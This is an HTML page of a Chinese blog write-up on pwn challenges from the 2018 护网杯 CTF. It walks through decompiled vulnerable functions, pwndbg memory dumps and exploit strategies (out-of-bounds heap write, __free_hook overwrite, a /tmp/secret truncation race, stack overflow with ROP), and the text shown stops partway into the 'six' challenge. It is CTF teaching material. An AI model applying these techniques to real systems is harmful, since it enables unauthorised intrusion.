<!DOCTYPE html>
<html lang="en" itemscope itemtype="http://schema.org/WebPage">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>2018护网杯 - pwn - writeup - localhost - Done with development, it&#39;s time to pwn.</title>
  

<meta name="renderer" content="webkit" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>

<meta name="MobileOptimized" content="width"/>
<meta name="HandheldFriendly" content="true"/>


<meta name="applicable-device" content="pc,mobile">

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<meta name="mobile-web-app-capable" content="yes">

<meta name="author" content="M4x" />
  <meta name="description" content="跟学校的队伍参加了又一次 ?网杯，记录一下 pwn 的 writeup。
" />
<meta name="keywords" content="pwn" />







<meta name="generator" content="Hugo 0.68.3" />


<link rel="canonical" href="https://bash-c.github.io/post/hwb2018-pwn-writeup/" />





<link rel="icon" href="/favicon.ico" />











<link rel="stylesheet" href="/sass/jane.min.f1e506a781bf25d33ffc18aa6b4e972a965c58049d27d4f92b7db2e9bf28e4bf.css" integrity="sha256-8eUGp4G/JdM//Biqa06XKpZcWASdJ9T5K32y6b8o5L8=" media="screen" crossorigin="anonymous">





<meta property="og:title" content="2018护网杯 - pwn - writeup" />
<meta property="og:description" content="跟学校的队伍参加了又一次 ?网杯，记录一下 pwn 的 writeup。" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://bash-c.github.io/post/hwb2018-pwn-writeup/" />
<meta property="article:published_time" content="2018-10-13T22:29:11+08:00" />
<meta property="article:modified_time" content="2018-10-13T22:29:11+08:00" />
<meta itemprop="name" content="2018护网杯 - pwn - writeup">
<meta itemprop="description" content="跟学校的队伍参加了又一次 ?网杯，记录一下 pwn 的 writeup。">
<meta itemprop="datePublished" content="2018-10-13T22:29:11&#43;08:00" />
<meta itemprop="dateModified" content="2018-10-13T22:29:11&#43;08:00" />
<meta itemprop="wordCount" content="2675">



<meta itemprop="keywords" content="pwn," /><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="2018护网杯 - pwn - writeup"/>
<meta name="twitter:description" content="跟学校的队伍参加了又一次 ?网杯，记录一下 pwn 的 writeup。"/>

<!--[if lte IE 9]>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
<![endif]-->

<!--[if lt IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
<![endif]-->




</head>
<body>
  <div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/" class="logo"># </a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>
<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    <li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/">cd ~</a>
          
        
      </li><li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/post/">ls -l /post</a>
          
        
      </li><li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/tags/">less /tags</a>
          
        
      </li><li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/categories/">tree /categories</a>
          
        
      </li><li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/link/">ping friends</a>
          
        
      </li><li class="mobile-menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/aboutme/">whoami</a>
          
        
      </li>
    

    
  </ul>
</nav>


  
    






  <link rel="stylesheet" href="/lib/photoswipe/photoswipe.min.css" />
  <link rel="stylesheet" href="/lib/photoswipe/default-skin/default-skin.min.css" />




<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

<div class="pswp__bg"></div>

<div class="pswp__scroll-wrap">
    
    <div class="pswp__container">
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
    </div>
    
    <div class="pswp__ui pswp__ui--hidden">
    <div class="pswp__top-bar">
      
      <div class="pswp__counter"></div>
      <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
      <button class="pswp__button pswp__button--share" title="Share"></button>
      <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
      <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
      
      
      <div class="pswp__preloader">
        <div class="pswp__preloader__icn">
          <div class="pswp__preloader__cut">
            <div class="pswp__preloader__donut"></div>
          </div>
        </div>
      </div>
    </div>
    <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
      <div class="pswp__share-tooltip"></div>
    </div>
    <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
    </button>
    <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
    </button>
    <div class="pswp__caption">
      <div class="pswp__caption__center"></div>
    </div>
    </div>
    </div>
</div>

  

  

  

  <header id="header" class="header container">
    <div class="logo-wrapper">
  <a href="/" class="logo">
    
      # 
    
  </a>
</div>

<nav class="site-navbar">
  <ul id="menu" class="menu">
    
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/">cd ~</a>
          

        

      </li>
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/post/">ls -l /post</a>
          

        

      </li>
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/tags/">less /tags</a>
          

        

      </li>
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/categories/">tree /categories</a>
          

        

      </li>
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/link/">ping friends</a>
          

        

      </li>
    
        <li class="menu-item">
        
          
          
            <a class="menu-item-link" href="https://bash-c.github.io/aboutme/">whoami</a>
          

        

      </li>
    

    
    

    
  </ul>
</nav>

  </header>

  <div id="mobile-panel">
    <main id="main" class="main bg-llight">
      <div class="content-wrapper">
        <div id="content" class="content container">
          <article class="post bg-white">
    
    <header class="post-header">
      <h1 class="post-title">2018护网杯 - pwn - writeup</h1>
      
      <div class="post-meta">
        <time datetime="2018-10-13" class="post-time">
          2018-10-13
        </time>
        <div class="post-category">
            <a href="https://bash-c.github.io/categories/writeup/"> writeup </a>
            
          </div>
        <span class="more-meta"> 2675 words </span>
          <span class="more-meta"> 6 min read </span>

        
        
          <span id="busuanzi_container_page_pv">
            | 阅读 <span id="busuanzi_value_page_pv"></span>
          </span>
        

        
        
      </div>
    </header>

    
    
<div class="post-toc" id="post-toc">
  <h2 class="post-toc-title">Table of Contents</h2>
  <div class="post-toc-content">
    <nav id="TableOfContents">
  <ul>
    <li><a href="#gettingstart">gettingstart</a></li>
    <li><a href="#shoppingcart">shoppingcart</a></li>
    <li><a href="#huwang">huwang</a></li>
    <li><a href="#six">six</a></li>
    <li><a href="#calendar">calendar</a></li>
  </ul>
</nav>
  </div>
</div>

    
    <div class="post-content">
      <p>跟学校的队伍参加了又一次 <code>?网杯</code>，记录一下 pwn 的 writeup。</p>
<h2 id="gettingstart">gettingstart</h2>
<p><a href="https://github.com/bash-c/pwn_repo/tree/master/HWB2018_gettingstart">binary &amp; exploit here</a></p>
<p>这道题没什么好说的（比签到题解出的人还多），(double) 0.1 在内存中的存储形式，可以参考 <a href="https://math.stackexchange.com/questions/1791562/converting-0-1-to-binary-64-bit-double">stackexchange</a></p>
<h2 id="shoppingcart">shoppingcart</h2>
<p><a href="https://github.com/bash-c/pwn_repo/tree/master/HWB2018_shoppingcart">binary &amp; exploit here</a></p>
<p>这道题目真是坑了很久，看到 <code>strtoul</code> 就没想通过负数数组越界了，后来发现可以负数越界时已经来不及写 exp 了。比赛结束后通过堆风水解出了题目，后来看 <a href="https://xz.aliyun.com/t/2893#toc-6">白泽</a> 的师傅的解法时，发现更简单，这里就介绍一下师傅的解法，用到了 libc 的 got 机制。</p>
<p>漏洞出现在 edit 功能里，存在数组越界，可以通过这个功能来 leak 和 overwrite。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="nf">edit</span><span class="p">()</span>
<span class="p">{</span>
  <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">idx</span><span class="p">;</span> <span class="c1">// rax
</span><span class="c1"></span>  <span class="kr">__int64</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// ST00_8
</span><span class="c1"></span>  <span class="kt">char</span> <span class="n">s</span><span class="p">[</span><span class="mi">24</span><span class="p">];</span> <span class="c1">// [rsp+10h] [rbp-20h]
</span><span class="c1"></span>  <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-8h]
</span><span class="c1"></span>
  <span class="n">v3</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span>
  <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Which goods you need to modify?&#34;</span><span class="p">);</span>
  <span class="n">fgets</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>
  <span class="n">idx</span> <span class="o">=</span> <span class="n">strtoul</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">&#34;OK, what would you like to modify %s to?</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">good_list</span><span class="p">[</span><span class="n">idx</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">good</span><span class="p">,</span> <span class="n">idx</span><span class="p">);</span>
  <span class="n">good_list</span><span class="p">[</span><span class="n">v1</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">good</span><span class="p">[</span><span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">good_list</span><span class="p">[</span><span class="n">v1</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">good</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">)]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></td></tr></table>
</div>
</div><p>leak 时可以用 <code>malloc(0)</code>，这样在输入时 fd 就不会被 <code>\0</code> 截断</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-C" data-lang="C">    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;How long is your goods name?&#34;</span><span class="p">);</span>
    <span class="n">fgets</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>
    <span class="n">size</span> <span class="o">=</span> <span class="n">strtoul</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="n">p_g</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">GOOD</span> <span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="mh">0x10uLL</span><span class="p">);</span>
    <span class="n">p_g</span><span class="o">-&gt;</span><span class="n">money</span> <span class="o">=</span> <span class="mi">999LL</span><span class="p">;</span>
    <span class="n">p_g</span><span class="o">-&gt;</span><span class="n">good</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">size</span><span class="p">);</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;What is your goods name?&#34;</span><span class="p">);</span>
    <span class="n">p_g</span><span class="o">-&gt;</span><span class="n">good</span><span class="p">[(</span><span class="kt">signed</span> <span class="kt">int</span><span class="p">)</span><span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">p_g</span><span class="o">-&gt;</span><span class="n">good</span><span class="p">,</span> <span class="n">size</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span><span class="c1">// size == 0
</span></code></pre></td></tr></table>
</div>
</div><p>这样通过 unsorted bin leak 就能 leak 出一个和 <a href="https://github.com/bash-c/main_arena_offset#install">main_arena</a> 相关的地址，通过这个地址可以找到 libc 的基址。</p>
<p>leak 完之后再次通过越界写改 <code>__free_hook</code> 即可，我的做法是通过堆风水，比较麻烦。后来发现白泽的师傅使用了 <code>libc.got['__free_hook']</code>，改写 <code>__free_hook</code> 的 got，这样实现起来就方便很多了。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">codebase</span> 
<span class="no">codebase</span> <span class="p">:</span> <span class="mi">0x55d24159a000</span>
<span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">telescope</span> <span class="p">(</span><span class="mi">0x2021E0</span><span class="err">+</span><span class="mi">0x55d24159a000</span><span class="p">-</span><span class="mi">0xb0</span><span class="p">)</span> 
<span class="mi">00</span><span class="p">:</span><span class="mi">0000</span><span class="err">│</span>   <span class="mi">0x55d24179c130</span> <span class="err">◂—</span> <span class="mi">0xa3831</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">18</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span>
<span class="err">01:0008│</span>   <span class="err">0</span><span class="nf">x55d24179c138</span> <span class="err">—▸</span> <span class="mi">0x7f9aa4cbcef8</span> <span class="err">—▸</span> <span class="mi">0x7f9aa4cbf7a8</span> <span class="p">(</span><span class="no">__free_hook</span><span class="p">)</span> <span class="err">◂—</span> <span class="mi">0x0</span>
<span class="err">02:0010│</span>   <span class="err">0</span><span class="nf">x55d24179c140</span> <span class="err">—▸</span> <span class="mi">0x55d241c32400</span> <span class="err">◂—</span> <span class="mi">0x0</span>
<span class="err">03:0018│</span>   <span class="err">0</span><span class="nf">x55d24179c148</span> <span class="err">—▸</span> <span class="mi">0x55d241c32450</span> <span class="err">—▸</span> <span class="mi">0x55d24179c0a8</span> <span class="err">◂—</span> <span class="mi">0xa31</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">1</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span>
<span class="err">04:0020│</span>   <span class="err">0</span><span class="nf">x55d24179c150</span> <span class="err">—▸</span> <span class="mi">0x55d241c32470</span> <span class="err">—▸</span> <span class="mi">0x55d24179c0b0</span> <span class="err">◂—</span> <span class="mi">0xa32</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">2</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span>
<span class="err">05:0028│</span>   <span class="err">0</span><span class="nf">x55d24179c158</span> <span class="err">—▸</span> <span class="mi">0x55d241c32490</span> <span class="err">—▸</span> <span class="mi">0x55d24179c0b8</span> <span class="err">◂—</span> <span class="mi">0xa33</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">3</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span>
<span class="err">06:0030│</span>   <span class="err">0</span><span class="nf">x55d24179c160</span> <span class="err">—▸</span> <span class="mi">0x55d241c324b0</span> <span class="err">—▸</span> <span class="mi">0x55d24179c0c0</span> <span class="err">◂—</span> <span class="mi">0xa34</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">4</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span>
<span class="err">07:0038│</span>   <span class="err">0</span><span class="nf">x55d24179c168</span> <span class="err">—▸</span> <span class="mi">0x55d241c324d0</span> <span class="err">—▸</span> <span class="mi">0x55d24179c0c8</span> <span class="err">◂—</span> <span class="mi">0xa35</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">5</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span>
</code></pre></td></tr></table>
</div>
</div><h2 id="huwang">huwang</h2>
<p><a href="https://github.com/bash-c/pwn_repo/tree/master/HWB2018_huwang">binary &amp; exploit here</a></p>
<blockquote>
<p>听 charlie 师傅说这道题目抄了他给国赛出的题。。。</p>
</blockquote>
<p>堆的功能没用，完全是硬加上去的。主要的逻辑在 666 这个选项里，功能是从 <code>/dev/urandom</code> 中读取 0xC 个字符，然后经过 n 轮 md5 运算，最后和用户的输入进行比较，如果比较成功则进入另一个有明显漏洞的函数，可以 leak 出 canary，stack 等信息，最后可以栈溢出，比较不成功则程序退出。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">secret_in_secret</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">rdi0</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">char</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// ST1B_1
</span><span class="c1"></span>  <span class="kt">int</span> <span class="n">s_len</span><span class="p">;</span> <span class="c1">// [rsp+1Ch] [rbp-214h]
</span><span class="c1"></span>  <span class="kt">char</span> <span class="n">occupation</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span> <span class="c1">// [rsp+20h] [rbp-210h]
</span><span class="c1"></span>  <span class="kt">char</span> <span class="n">s</span><span class="p">[</span><span class="mi">264</span><span class="p">];</span> <span class="c1">// [rsp+120h] [rbp-110h]
</span><span class="c1"></span>  <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+228h] [rbp-8h]
</span><span class="c1"></span>
  <span class="n">v5</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Congratulations, %s guessed my secret!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">rdi0</span><span class="p">);</span><span class="c1">// leak
</span><span class="c1"></span>  <span class="n">puts</span><span class="p">(</span><span class="s">&#34;And I want to know someting about you, and introduce you to other people who guess the secret!&#34;</span><span class="p">);</span>
  <span class="n">puts</span><span class="p">(</span><span class="s">&#34;What`s your occupation?&#34;</span><span class="p">);</span>
  <span class="n">get_str</span><span class="p">(</span><span class="n">occupation</span><span class="p">,</span> <span class="mi">255LL</span><span class="p">);</span>
  <span class="n">s_len</span> <span class="o">=</span> <span class="n">snprintf</span><span class="p">(</span>
            <span class="n">s</span><span class="p">,</span>
            <span class="mi">255uLL</span><span class="p">,</span>
            <span class="s">&#34;I know a new friend, his name is %s,and he is a noble %s.He is come from north and he is very handsome......&#34;</span>
            <span class="s">&#34;....................................................................................................&#34;</span><span class="p">,</span>
            <span class="n">rdi0</span><span class="p">,</span>
            <span class="n">occupation</span><span class="p">);</span>
  <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Here is your introduce&#34;</span><span class="p">);</span>
  <span class="n">puts</span><span class="p">(</span><span class="n">s</span><span class="p">);</span>
  <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Do you want to edit you introduce by yourself[Y/N]&#34;</span><span class="p">);</span>
  <span class="n">v1</span> <span class="o">=</span> <span class="n">getchar</span><span class="p">();</span>
  <span class="n">getchar</span><span class="p">();</span>
  <span class="k">if</span> <span class="p">(</span> <span class="n">v1</span> <span class="o">==</span> <span class="sc">&#39;Y&#39;</span> <span class="p">)</span>
    <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="n">s_len</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>                      <span class="c1">// overflow
</span><span class="c1"></span>  <span class="n">printf</span><span class="p">(</span><span class="s">&#34;The final presentation is as follows:%s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></td></tr></table>
</div>
</div><p>其中 md5 运算的轮数是用户决定的</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-C" data-lang="C">    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Input how many rounds do you want to encrypt the secret:&#34;</span><span class="p">);</span>
    <span class="n">how_many</span> <span class="o">=</span> <span class="n">get_int</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span> <span class="n">how_many</span> <span class="o">&gt;</span> <span class="mi">10</span> <span class="p">)</span>
    <span class="p">{</span>
      <span class="n">puts</span><span class="p">(</span><span class="s">&#34;What? Why do you need to encrypt so many times?&#34;</span><span class="p">);</span>
      <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">how_many</span> <span class="p">)</span>
    <span class="p">{</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">&#34;At least encrypt one time&#34;</span><span class="p">,</span> <span class="n">s_secret</span><span class="p">);</span>
      <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">HIDWORD</span><span class="p">(</span><span class="n">v2</span><span class="p">)</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/tmp/secret&#34;</span><span class="p">,</span> <span class="mo">01001</span><span class="p">);</span>
    <span class="n">LODWORD</span><span class="p">(</span><span class="n">v2</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">v2</span> <span class="o">&lt;</span> <span class="n">how_many</span> <span class="p">)</span>       <span class="c1">// negative
</span><span class="c1"></span>    <span class="p">{</span>
      <span class="n">MD5</span><span class="p">((</span><span class="kr">__int64</span><span class="p">)</span><span class="n">s_secret</span><span class="p">,</span> <span class="mi">16LL</span><span class="p">,</span> <span class="p">(</span><span class="kr">__int64</span><span class="p">)</span><span class="n">s_secret</span><span class="p">);</span>
      <span class="n">LODWORD</span><span class="p">(</span><span class="n">v2</span><span class="p">)</span> <span class="o">=</span> <span class="n">v2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
</code></pre></td></tr></table>
</div>
</div><p>只判断了大于 10 和不为 0 的情况，但我们可以输入负数，当输入负数时，在 <code>signed</code> 和 <code>unsigned</code> 比较时 -1 会转化为一个很大的数，while 循环就会陷入一段很长时间的运算。</p>
<p>这时如果再开一个 io 连接远程进入到这个流程中，到 MD5 之前</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">    HIDWORD(v2) = open(&#34;/tmp/secret&#34;, 01001);
    LODWORD(v2) = 0;
    while ( (unsigned int)v2 &lt; how_many )       // negative
    {
      MD5((__int64)s_secret, 16LL, (__int64)s_secret);
      LODWORD(v2) = v2 + 1;
    }
</code></pre></td></tr></table>
</div>
</div><p>这里 <code>open</code> 是以 <code>O_WRONLY | O_TRUNC</code> 的 flags 打开的，其中 <a href="https://code.woboq.org/userspace/glibc/sysdeps/unix/sysv/linux/bits/fcntl-linux.h.html#_M/O_TRUNC">O_TRUNC</a> 的含义是 <strong>当文件存在且被另一个程序以可写的模式打开时，把文件的长度截短为 0</strong>，因此此时第二个 io 将得到一个空的 <code>/tmp/secret</code>，因此只要我们输入 <code>MD5('\0' * 16)</code> 即可通过后边的 memcpy 验证，进入漏洞函数。</p>
<p>进入漏洞函数后，方法就很多了，通过 stack-pivot 进行 orw 或者 leak libc 进而 get shell 都可以，我选择的是使用 <code>open, read, puts</code> 的方法。运气比较好，rdx 满足条件。</p>
<h2 id="six">six</h2>
<p><a href="https://github.com/bash-c/pwn_repo/tree/master/HWB2018_six">binary &amp; exploit here</a></p>
<blockquote>
<p>总觉得这道题目以前在哪里见过，忘了是哪次比赛的了。</p>
</blockquote>
<p>首先程序有两次 mmap，经过分析，两处空间分别用于保存 shellcode 和模拟栈，shellcode 权限是 rwx 。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="nf">mmap_rwx</span><span class="p">()</span>
<span class="p">{</span>
  <span class="kt">int</span> <span class="n">fd</span><span class="p">;</span> <span class="c1">// ST04_4
</span><span class="c1"></span>  <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">12</span><span class="p">];</span> <span class="c1">// [rsp+8h] [rbp-18h]
</span><span class="c1"></span>  <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-8h]
</span><span class="c1"></span>
  <span class="n">v2</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span>
  <span class="n">setvbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span>
  <span class="n">setvbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span>
  <span class="n">setvbuf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span>
  <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/dev/urandom&#34;</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
  <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">6uLL</span><span class="p">);</span>
